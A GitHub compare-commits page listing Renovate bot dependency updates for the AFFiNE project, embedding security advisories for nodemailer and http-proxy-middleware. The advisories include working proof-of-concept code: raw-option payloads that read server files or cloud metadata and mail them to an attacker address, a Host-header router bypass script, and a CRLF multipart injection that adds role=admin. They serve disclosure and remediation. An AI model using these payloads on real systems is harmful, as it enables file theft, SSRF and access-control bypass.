Compare commits

...

319 Commits

Author SHA1 Message Date
renovate[bot] fa488aee64 chore: bump up apple/swift-collections version to from: "1.6.0" (#15136)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[apple/swift-collections](https://redirect.github.com/apple/swift-collections)
| minor | `from: "1.5.1"` → `from: "1.6.0"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

###
[`v1.6.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.6.0):
Swift Collections 1.6.0

[Compare
Source](https://redirect.github.com/apple/swift-collections/compare/1.5.1...1.6.0)

This is a feature release adding several useful operations to ordered
collections, as well as shipping bug fixes that landed since 1.5.1.

The list of supported Swift toolchain versions remains 6.0, 6.1, 6.2,
and 6.3 for now. Note that we intend to retire support for Swift 6.0 and
6.1 in a subsequent release later this year.

#### New `OrderedCollections` operations

We now have several new operations that move existing elements in an
`OrderedSet` or `OrderedDictionary` to a new position within the same
collection:

- `OrderedSet.moveSubrange(_:to:)` and
`OrderedDictionary.moveSubrange(_:to:)` move items at a range of indices
to just before the item at the specified destination index.
- `OrderedSet.move(members:to:)` and `OrderedDictionary.move(keys:to:)`
relocate elements identified by value (or key), preserving the order in
which they're listed.
- `OrderedSet.move(indices:to:)` and
`OrderedDictionary.move(indices:to:)` relocate items at an arbitrary
sequence of indices, preserving their listed order.

#### Bugfixes

- `SortedCollections` \[with the `UnstableSortedCollections` trait]: The
default capacity of B-tree nodes is no longer clamped at 16, improving
performance.
([#&#8203;257](https://redirect.github.com/apple/swift-collections/issues/257))
- `DequeModule`: The ownership-aware `RigidDeque` and `UniqueDeque`
types no longer hand out invalid spans to clients
([#&#8203;659](https://redirect.github.com/apple/swift-collections/issues/659))
- `ContainersPreview` \[with the `UnstableContainersPreview` trait]: The
deprecated `Borrow` type alias is now declared with correct
availability.
([#&#8203;655](https://redirect.github.com/apple/swift-collections/issues/655))

#### What's Changed

- Add missing availability to Borrow by
[@&#8203;guoye-zhang](https://redirect.github.com/guoye-zhang) in
[#&#8203;655](https://redirect.github.com/apple/swift-collections/pull/655)
- \[InternalCollectionsUtilities] Fix \_trim returning the wrong buffer
region by
[@&#8203;adityasingh2400](https://redirect.github.com/adityasingh2400)
in
[#&#8203;659](https://redirect.github.com/apple/swift-collections/pull/659)
- \[SortedCollections] Fix \_BTree default node capacity capping at 16
by
[@&#8203;adityasingh2400](https://redirect.github.com/adityasingh2400)
in
[#&#8203;661](https://redirect.github.com/apple/swift-collections/pull/661)
- Small benchmarking improvements by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;664](https://redirect.github.com/apple/swift-collections/pull/664)
- \[OrderedCollections] Add move operations by
[@&#8203;dnadoba](https://redirect.github.com/dnadoba) in
[#&#8203;660](https://redirect.github.com/apple/swift-collections/pull/660)
- 1.6.0 prerelease cleanups by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;665](https://redirect.github.com/apple/swift-collections/pull/665)

#### New Contributors

- [@&#8203;guoye-zhang](https://redirect.github.com/guoye-zhang) made
their first contribution in
[#&#8203;655](https://redirect.github.com/apple/swift-collections/pull/655)
- [@&#8203;adityasingh2400](https://redirect.github.com/adityasingh2400)
made their first contribution in
[#&#8203;659](https://redirect.github.com/apple/swift-collections/pull/659)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.5.1...1.6.0>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-22 11:49:09 +08:00
DarkSky bb8454e7e1 refactor(native): cache & job runtime (#15139) 2026-06-22 11:48:37 +08:00
renovate[bot] 7ea8800c99 chore: bump up nodemailer version to v9 [SECURITY] (#15134)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [nodemailer](https://nodemailer.com/)
([source](https://redirect.github.com/nodemailer/nodemailer)) |
[`^8.0.11` →
`^9.0.0`](https://renovatebot.com/diffs/npm/nodemailer/8.0.11/9.0.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/nodemailer/9.0.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/nodemailer/8.0.11/9.0.1?slim=true)
|

---

### Nodemailer: Message-level raw option bypasses
disableFileAccess/disableUrlAccess, enabling arbitrary file read and
full-response SSRF in the delivered message

[GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

<details>
<summary>More information</summary>

#### Details
##### Message-level `raw` option bypasses `disableFileAccess` /
`disableUrlAccess`, enabling arbitrary file read and full-response SSRF
in the sent message

- **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD
`4e58450eb490e5097a74b2b2cce35a8d9e21856e`)
- **Verdict:** CONFIRMED (local PoC, no network)

##### Summary

Nodemailer exposes `disableFileAccess` and `disableUrlAccess` so an
application that passes
**untrusted** message data to the library can forbid that data from
reading local files or
fetching URLs. Every attachment, alternative,
`html`/`text`/`watchHtml`/`amp` and `icalEvent`
content node honors these flags. **The message-level `raw` option does
not.**

`MailComposer.compile()` builds the root MIME node for a `raw` message
**without** threading the
two flags, so a `raw: { path: '/etc/passwd' }` or `raw: { href:
'http://169.254.169.254/…' }`
message is read / fetched anyway, and the file or HTTP-response bytes
become the **actual
message that is sent** by every transport (SMTP, SES, sendmail, stream,
JSON). An actor whose
input the application intended to sandbox therefore obtains arbitrary
local-file disclosure and
a full-response SSRF primitive, delivered to a recipient the same actor
can choose.

This is the same vulnerability class as the already-published
jsonTransport advisory
**GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node,
not `normalize()`), and
strictly higher impact: the jsonTransport bug only affected the
locally-returned JSON, whereas
this affects the delivered RFC822 message for all transports.

##### Affected component

- `lib/mail-composer/index.js:34-35` — root cause:
  ```js
  if (this.mail.raw) {
this.message = new MimeNode('message/rfc822', { newline:
this.mail.newline }).setRaw(this.mail.raw);
  }
  ```
The `MimeNode` is constructed with only `{ newline }`. Compare the
sibling node builders

`_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode`
  (`lib/mail-composer/index.js:389-527`), which all pass
`disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess:
this.mail.disableFileAccess`.
- `lib/mime-node/index.js:51-52` — the constructor derives
`this.disableFileAccess`/
`this.disableUrlAccess` solely from its own `options`; children do
**not** inherit a parent's
flags (`createChild`/`appendChild`, lines 175-194, pass options through
verbatim).
- `lib/mime-node/index.js:812` — `setRaw()` content is resolved through
`this._getStream(this._raw)`.
- `lib/mime-node/index.js:984-1010` — `_getStream` reads the file
(`fs.createReadStream`, 995) or
fetches the URL (`nmfetch`, 1009) **only guarded by
`this.disableFileAccess`/`this.disableUrlAccess`**,
  which on the `raw` root node are `false`.
- Reached from the normal send flow at `lib/mailer/index.js:188`
(`mail.message = new MailComposer(mail.data).compile()`), so every
transport is affected.

##### Reachability gate (hop-by-hop)

1. **Source.** Application calls `transporter.sendMail({ raw:
<userControlled> , to: <userControlled> })`
with `disableFileAccess: true` and/or `disableUrlAccess: true`
configured on the transporter
(forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per
message. This is the
exact scenario the flags exist for — the same precondition under which
GHSA-wqvq-jvpq-h66f was
   accepted.
2. **Guard — the access flags.** For attachments the flag is enforced: a
node created by
`_createContentNode` carries `disableFileAccess`, so `_getStream` throws
`EFILEACCESS`.
**Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on
its node, so
`this.disableFileAccess === false` and the guard at `mime-node:985` /
`:999` is skipped.
There is no other validation between `mail.raw` and the read; `raw`
content shapes
(`{path}`, `{href}`, stream, string, buffer) are accepted as-is by
`setRaw`/`_getStream`.
3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or
`nmfetch(content.href, …)` (SSRF). The resulting bytes are emitted as
the message body by
   `createReadStream()`, which every transport pipes to its destination
(`smtp-transport:233`, `smtp-pool/pool-resource:208`,
`ses-transport:96`, `sendmail-transport:184`,
   `stream-transport:67`).

No guard blocks the chain; the only guard (the access flags) is
structurally absent on this node.

##### Root cause

Inconsistent enforcement: the access policy is applied per-`MimeNode`
via constructor options and
must be re-passed at every node creation. The `raw`-message shortcut in
`compile()` omits it,
while all five other node builders include it. The flags are therefore
enforced for every content
type *except* the one that lets the caller supply a complete message
body by path/URL.

##### Exploit path

Application that sandboxes untrusted mail input
(`disableFileAccess`/`disableUrlAccess` set):

1. Untrusted actor supplies `raw: { path: '/proc/self/environ' }` (or
any server file:
   `/app/.env`, key material, etc.) and `to: attacker@evil.test`.
2. `compile()` builds the raw root node without the flags; the transport
reads the file and sends
its contents as the message → **arbitrary server-file exfiltration to an
attacker-chosen mailbox.**
3. Alternatively `raw: { href: 'http://127.0.0.1:8080/admin' }` or a
cloud metadata URL →
Nodemailer fetches it server-side and delivers the full response body in
the email →
   **full-response SSRF** (no blind-channel limitation).

##### Impact

- **Confidentiality (High):** arbitrary local file read disclosed in the
outgoing message;
full-response SSRF to internal/metadata endpoints, also disclosed in the
message.
- **Integrity (Low):** attacker-fetched/file content is injected into
the delivered mail.
- The two protective flags an application relies on to contain untrusted
input are silently
  ineffective for `raw`.

##### Preconditions

The application (a) passes `disableFileAccess` and/or `disableUrlAccess`
(the documented sandboxing
flags) and (b) lets untrusted input influence the `raw` field (and, for
maximal disclosure, `to`).
No other configuration is required; all bundled transports are affected.
This mirrors the accepted
precondition of GHSA-wqvq-jvpq-h66f.

##### Severity

- **AV** — message data routinely originates over the network in the
apps these flags protect.
- **AC** — a single crafted `raw` object; deterministic.
- **PR** — the actor is a user whose input the app already treats as
untrusted (the reason the
  flags are set); not fully anonymous in the typical deployment.
- **UI** — no victim interaction.
- **S** — impact within Nodemailer's process scope.
- **C** — arbitrary file read **and** full-response SSRF, both delivered
to an attacker-chosen
recipient. (The sibling jsonTransport advisory used C:L because its leak
stayed in locally-returned
JSON; here the bytes leave the system in the sent message, so C:H is
warranted.)
- **I** — attacker injects fetched/file bytes into the outgoing message.
- **A**.
Note: if a deployment fixes the recipient (`to` not attacker-controlled)
the disclosure channel
narrows and the rating degrades toward the sibling's Medium; the High
rating reflects the
reasonable worst case where `raw` and `to` are both untrusted.

##### Adversarial re-read (attempts to refute)

1. **"`raw` content is by-design trusted, so the flags shouldn't
apply."** Rejected: every other
content path (attachments, alternatives, html/text, icalEvent) honors
the flags, and the
maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this
"untrusted input + flag set"
model. The asymmetry — attachment `{path}` is blocked but `raw:{path}`
is not — is the bug, and
the PoC's CONTROL case proves the flag is otherwise effective on the
same file.
2. **"The raw node inherits the flags via rootNode."** Rejected by code
and by PoC: `compile():35`
constructs the node with `{ newline }` only; `MimeNode` constructor sets
`this.disableFileAccess = !!options.disableFileAccess` → `false`;
`rootNode` is itself; no
   inheritance exists.
3. **"The PoC leaks for an unrelated reason."** Rejected: the CONTROL
message (`attachments:[{path}]`,
same file, same transporter) returns `EFILEACCESS`; only the
`raw:{path}` message leaks. The
sentinel nonce exists solely in the temp file; the URL nonce is
generated server-side and is only
obtainable by an actual fetch. Both observables are uniquely bound to
the bypass.
4. **"Maybe only jsonTransport (already reported) is affected."**
Rejected: the PoC uses
`streamTransport` and the root cause is in `MailComposer.compile()`
(`mailer:188`), shared by all
   transports; jsonTransport is a different (already-fixed) path.

I could not find any guard that blocks the chain; the finding survives.

##### Proof of concept (safe, benign)

`findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` — local, no
network egress (loopback only),
no destructive action. Output:
```
[CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here
[ATTACK]  raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message
[ATTACK]  raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF)
VERDICT: CONFIRMED
```
Run: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0
= confirmed).

##### Remediation

Thread the access policy onto the `raw` root node, exactly as the other
builders do:
```js
if (this.mail.raw) {
    this.message = new MimeNode('message/rfc822', {
        newline: this.mail.newline,
        disableFileAccess: this.mail.disableFileAccess,
        disableUrlAccess: this.mail.disableUrlAccess
    }).setRaw(this.mail.raw);
}
```
(Defense in depth: `setRaw`/`_getStream` could also refuse
`{path}`/`{href}` raw content when either
flag is set, regardless of how the node was constructed.) Add a
regression test asserting that
`raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS`
when the flags are set, mirroring
the attachment tests.

#### Severity
- CVSS Score: 7.1 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N`

#### References
-
[https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f)
-
[https://github.com/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>nodemailer/nodemailer (nodemailer)</summary>

###
[`v9.0.1`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#901-2026-06-17)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v9.0.0...v9.0.1)

##### Bug Fixes

- enforce disableFileAccess/disableUrlAccess for raw message option
([a82e060](https://redirect.github.com/nodemailer/nodemailer/commit/a82e060d978f27e5f41369a9a9807b1e3dedc2e2))

###
[`v9.0.0`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#900-2026-06-14)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v8.0.11...v9.0.0)

##### ⚠ BREAKING CHANGES

- HTTPS requests made while fetching remote content (attachment
href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now
validate the server's TLS certificate by default. Requests to hosts with
self-signed, expired, or hostname-mismatched certificates that
previously succeeded will now fail. Opt back out per request with
tls.rejectUnauthorized=false (transport options, or a per-attachment
`tls` option).

##### Bug Fixes

- replace deprecated url.parse with a WHATWG URL wrapper
([0c080fb](https://redirect.github.com/nodemailer/nodemailer/commit/0c080fbf3278926f013a5c2ad06f5f6f0e18f5ed))
- validate TLS certificates by default when fetching remote content
([6a947ac](https://redirect.github.com/nodemailer/nodemailer/commit/6a947ac7114a16da1e6a50d9a6f4e17026ce145d))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 22:51:23 +08:00
renovate[bot] 16196c6ca1 chore: bump up http-proxy-middleware version to v3.0.7 [SECURITY] (#15131)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware)
| [`3.0.5` →
`3.0.7`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.5/3.0.7)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/http-proxy-middleware/3.0.7?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/http-proxy-middleware/3.0.5/3.0.7?slim=true)
|

---

### http-proxy-middleware `router` host+path substring matching allows
Host-header-driven backend routing bypass
[CVE-2026-55602](https://nvd.nist.gov/vuln/detail/CVE-2026-55602) /
[GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

<details>
<summary>More information</summary>

#### Details
##### Summary

`http-proxy-middleware` documents `router` proxy-table entries as host,
path, or host+path selectors, but the host+path implementation uses
unanchored substring matching on attacker-controlled request metadata.
As a result, a crafted `Host` header that is only a superstring match
for a configured host+path key can still route a request to an
unintended backend.

##### Details

Tested code state:

- validated on tag `v4.0.0-beta.5`
- corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358`

Relevant code locations:

- `src/router.ts`
- `src/http-proxy-middleware.ts`

Affected public API:

- `createProxyMiddleware({ router: { 'host/path': 'http://target' } })`

Code explanation:

When a proxy-table router key contains `/`, `getTargetFromProxyTable()`
concatenates attacker-controlled `req.headers.host` and `req.url` into a
single `hostAndPath` string, then accepts the route if:

```ts
hostAndPath.indexOf(key) > -1
```

That is a substring test, not an exact host match plus intended path
match. In the validated PoC, the configured router key is:

```txt
localhost:3000/api
```

but the attacker-controlled host is:

```txt
evillocalhost:3000
```

and the request path is:

```txt
/api
```

The concatenated attacker-controlled string:

```txt
evillocalhost:3000/api
```

still contains the configured router key as a substring, so the
middleware selects the alternate backend even though the host is not
equal to the configured host.

Exploit path:

1. the application enables the documented proxy-table `router` feature
with at least one host+path rule
2. an external attacker sends an ordinary HTTP request with a crafted
`Host` header
3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection
before proxying
4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string
through substring matching
5. the request is proxied to the wrong backend

##### PoC

Create these files in the same working directory and run:

```bash
bash ./run.sh
```

##### File: `run.sh`

```bash

#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_URL="https://github.com/chimurai/http-proxy-middleware.git"
REPO_REF="v4.0.0-beta.5"
WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")"
TARGET_REPO_DIR="${WORKDIR}/repo"
REPRO_DIR="${WORKDIR}/reproduction"
IMAGE_TAG="http-proxy-middleware-router-bypass-poc"

cleanup() {
  rm -rf "${WORKDIR}"
}
trap cleanup EXIT

echo "[a3] cloning target repository"
git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}"
git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}"

mkdir -p "${REPRO_DIR}"
cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile"
cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs"

echo "[a3] building reproduction image"
docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}"

echo "[a3] running verification"
docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs
```

##### File: `Dockerfile`

```Dockerfile
FROM node:22-bullseye

WORKDIR /work

COPY repo/package.json repo/yarn.lock /work/repo/

RUN corepack enable \
  && cd /work/repo \
  && yarn install --frozen-lockfile

COPY repo /work/repo
RUN cd /work/repo && yarn build

COPY reproduction /work/reproduction
```

##### File: `verify.mjs`

```js
import http from 'node:http';
import fs from 'node:fs';
import assert from 'node:assert/strict';

import { createProxyMiddleware } from '/work/repo/dist/index.js';

const ROUTER_KEY = 'localhost:3000/api';
const CRAFTED_HOST = 'evillocalhost:3000';

function listen(server, port) {
  return new Promise((resolve) => {
    server.listen(port, '127.0.0.1', () => resolve());
  });
}

function close(server) {
  return new Promise((resolve, reject) => {
    server.close((err) => {
      if (err) {
        reject(err);
        return;
      }
      resolve();
    });
  });
}

function request(path, host) {
  return new Promise((resolve, reject) => {
    const req = http.request(
      {
        host: '127.0.0.1',
        port: 3000,
        path,
        method: 'GET',
        headers: {
          Host: host,
        },
      },
      (res) => {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) => {
          data += chunk;
        });
        res.on('end', () => {
          resolve({ statusCode: res.statusCode, body: data });
        });
      },
    );
    req.on('error', reject);
    req.end();
  });
}

const defaultBackend = http.createServer((req, res) => {
  res.end('DEFAULT');
});

const secretBackend = http.createServer((req, res) => {
  res.end('SECRET');
});

const proxyMiddleware = createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});

const proxyServer = http.createServer((req, res) => {
  proxyMiddleware(req, res, () => {
    res.statusCode = 404;
    res.end('NO_PROXY');
  });
});

try {
  assert.ok(fs.existsSync('/work/repo/dist/index.js'));
  assert.ok(fs.existsSync('/work/reproduction/verify.mjs'));

  await listen(defaultBackend, 3101);
  await listen(secretBackend, 3102);
  await listen(proxyServer, 3000);
  console.log('STEP start-services ok');

  const baseline = await request('/api', 'safe.example:3000');
  assert.equal(baseline.statusCode, 200);
  assert.equal(baseline.body, 'DEFAULT');
  console.log(`STEP baseline-route body=${baseline.body}`);

  const crafted = await request('/api', CRAFTED_HOST);
  assert.equal(crafted.statusCode, 200);
  assert.equal(crafted.body, 'SECRET');
  assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]);
  console.log(`STEP crafted-route body=${crafted.body}`);

  console.log('RESULT reproduced host_header_injection router substring match bypass');
} finally {
  await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);
}
```

This PoC starts:

- one default backend returning `DEFAULT`
- one alternate backend returning `SECRET`
- one proxy using:

```js
createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});
```

It then sends:

1. a baseline request to `/api` with `Host: safe.example:3000`
2. a crafted request to `/api` with `Host: evillocalhost:3000`

Observed result from the validated PoC:

- baseline request: `STEP baseline-route body=DEFAULT`
- crafted request: `STEP crafted-route body=SECRET`
- success marker: `RESULT reproduced host_header_injection router
substring match bypass`

The PoC is considered successful only if:

1. the baseline request stays on the default backend
2. the crafted request reaches the alternate backend
3. the crafted host is not equal to the configured router host

##### Impact

This is a backend-selection integrity issue in a documented library
feature. Applications that use host+path router-table rules for backend
segmentation, tenant routing, or separation of public and more sensitive
upstreams can have that routing boundary bypassed by an unauthenticated
external client using an ordinary crafted `Host` header.

#### Severity
- CVSS Score: 6.9 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj)
-
[https://github.com/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### http-proxy-middleware: multipart/form-data field injection via
unescaped CRLF in `fixRequestBody`
[CVE-2026-55603](https://nvd.nist.gov/vuln/detail/CVE-2026-55603) /
[GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

<details>
<summary>More information</summary>

#### Details
##### Summary
`fixRequestBody()` is the library's documented helper for re-emitting a
request body that was already consumed by a body parser. When the
**outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the
body with `handlerFormDataBodyData()`, which interpolates each
`req.body` key and value directly into the multipart wire format
**without neutralizing CR/LF**:

```js
// dist/handlers/fix-request-body.js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`;
  }
}
```

A `\r\n` inside a value (or key) lets an attacker close the current part
and inject an **entirely new form part**. Because the proxy's own body
parser saw a single opaque value, any gateway-side policy or validation
performed on `req.body` is evaluated against a different set of fields
than the upstream backend ultimately parses a request/parameter
desynchronization across the trust boundary.

By contrast, the sibling output branches are safe: `application/json`
uses `JSON.stringify` (escapes control chars) and
`application/x-www-form-urlencoded` uses `querystring.stringify`
(percent-encodes). Only the multipart branch lacks escaping.

##### Preconditions 
All three must hold; this narrows real-world exposure and is the basis
for `AC:H`:
1. The proxy app populates `req.body` with a **non-multipart** parser
(`express.urlencoded`, `express.json`, or text) so an injected boundary
in a value is **not** split on input.
2. The proxied (outgoing) request is sent as **`multipart/form-data`**
(e.g. an adaptation layer, or any flow that sets the upstream
content-type to multipart), so the vulnerable branch runs.
3. The app calls `fixRequestBody` (the documented pattern for "I
body-parsed, now re-stream"), and an attacker controls at least one body
field value or key.

> Note: a pure multipart-in → multipart-out flow (e.g. `multer`) is
generally **not** exploitable for a *new-field* injection, because the
proxy's multipart parser already splits the injected boundary, so
`req.body` and the backend agree. The desync specifically requires a
non-multipart input parser.

##### Impact
When the preconditions hold, an attacker injects/overrides multipart
fields seen only by the backend:
- **Validation / access-control bypass** bypass gateway-side field
checks (demonstrated below: a gateway that forbids `role=admin` is
bypassed; backend grants admin).
- **Parameter tampering** add or overwrite fields the backend trusts
(IDs, flags, prices).
- **File-part injection** inject a `filename="..."` part into the
upstream multipart stream.

##### Proof of Concept

```js
// npm i http-proxy-middleware@4.0.0   (Node ESM: save as minimal.mjs)
import { fixRequestBody } from 'http-proxy-middleware';

// `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it.
// The attacker sent  user=alice%0D%0A--BB%0D%0A...  so this ONE field's value holds CRLF:
const req = { readableLength: 0, body: {
  user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--'
}};

// Minimal stand-in for the outgoing proxy request; capture what gets written.
const out = [];
const proxyReq = {
  h: { 'content-type': 'multipart/form-data; boundary=BB' },
  getHeader(n){ return this.h[n.toLowerCase()]; },
  setHeader(n,v){ this.h[n.toLowerCase()] = v; },
  write(d){ out.push(Buffer.from(d)); },
};

fixRequestBody(proxyReq, req);          // library rebuilds the multipart body
console.log(Buffer.concat(out).toString());
```

Output: one input field becomes **two** parts; `role=admin` was injected
via the unescaped CRLF:

```
--BB
Content-Disposition: form-data; name="user"

alice
--BB
Content-Disposition: form-data; name="role"     <-- injected part; never present in req.body's keys
admin
--BB--
```

`req.body` had a single key (`user`), so any gateway policy checking
`req.body.role` passes, yet the backend's multipart parser receives
`role=admin`. On the wire the attacker simply sends, as
`application/x-www-form-urlencoded`:
`user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--`

##### Remediation
Neutralize CR/LF (and `"`) in keys/values before interpolation, or build
the body with a real multipart encoder (e.g. `FormData` / `form-data`)
instead of string concatenation. Minimal fix:

```js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  const bad = /[\r\n]/;
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    const v = String(value);
    if (bad.test(key) || bad.test(v)) {
      throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value');
    }
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`;
  }
}
```
(Reject is preferable to silent stripping, to avoid masking malicious
input.)

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N`

#### References
-
[https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm)
-
[https://github.com/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>chimurai/http-proxy-middleware
(http-proxy-middleware)</summary>

###
[`v3.0.7`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.7)

[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7)

#### What's Changed

